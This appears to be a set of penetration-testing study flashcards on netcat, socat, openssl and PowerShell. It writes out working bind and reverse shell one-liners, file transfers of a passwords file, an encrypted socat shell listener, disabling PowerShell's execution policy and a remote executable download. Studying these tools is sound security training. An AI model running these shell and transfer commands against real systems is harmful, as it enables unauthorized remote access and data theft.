Chapter 4: Practical Tools Flashcards
Type out a netcat command listening on port 4444.
nc -nvlp 4444
Type out a netcat command connecting to another address on port 4444.
nc -nv 10.11.1.1 4444
What does the -e switch on netcat do? Explain it in terms of data streams.
The -e switch executes the named program once a connection is established and redirects that program's standard input, standard output and standard error streams to the socket. An application like /bin/bash executed this way has all of its data sent through the port, meaning whoever connects to the port receives its output and can feed it input.
Type out a netcat bind shell.
nc -lvnp 4444 -e /bin/bash
Type out a netcat reverse shell.
nc -nv 10.11.1.1 4444 -e /bin/bash
How do you connect to a remote server using socat?
socat - TCP4:10.11.1.1:80
How do you use socat to create a listener?
socat - TCP4-LISTEN:443 STDOUT
How do you send a file using socat?
socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Receiving a file with socat, what do we type?
socat TCP4:10.11.0.4:443 file:recieved_secret_password.txt,create
In terms of socat reverse shells, how do we set up a listener?
sudo socat TCP4-LISTEN:443 STDOUT
In terms of socat reverse shells, how do we initiate the connection?
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
How do we send a file using netcat? Type out the client and server commands.
nc -nv 10.11.1.3 80 < file.txt
nc -nvlp 80 > file.txt
Use the openssl command to create a self-signed certificate, so we can use an encrypted socat connection.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
After we have generated a certificate for SSL, what are the next steps, including the commands?
We need to combine bind_shell.key and bind_shell.crt into a single bind_shell.pem so that socat can read it.
We do this with: cat bind_shell.key bind_shell.crt > bind_shell.pem
After the SSL certificate has been completed, how do we then start a listener?
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
On Windows PowerShell, how do we review the execution policy?
Get-ExecutionPolicy
Why is the execution policy on Windows PowerShell important?
The execution policy on Windows PowerShell is set to Restricted by default, meaning we cannot run any scripts or configuration files. This is for security reasons, but it also restricts our use of the shell, which is why we turn it off.
On Windows PowerShell, how do we set the execution policy to Unrestricted?
Set-ExecutionPolicy Unrestricted
How do we download a file using PowerShell?
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.1.1/wget.exe','C:\Users\Dan\Desktop\wget.exe')"
In the PowerShell download command, what does the -c switch do?
Executes the supplied command enclosed in double quotes.
In a PowerShell command, what does the new-object cmdlet do?
Instantiates either a .NET Framework or a COM object.
Within the context of a PowerShell download command, expand on what "new-object System.Net.WebClient" means.
new-object instantiates either a .NET Framework or a COM object. Here the new-object cmdlet creates an instance of the WebClient class, which is defined in the System.Net namespace. The WebClient class is used to access resources from a URI and exposes a public method called DownloadFile, which takes two parameters: a source location (the URI) and a target location (the local file path).
What is Powercat?
Powercat is essentially the PowerShell version of netcat.
In the context of PowerShell, what is dot-sourcing?
Dot-sourcing runs a script in the current scope, making all functions and variables declared in the script available in the current PowerShell session.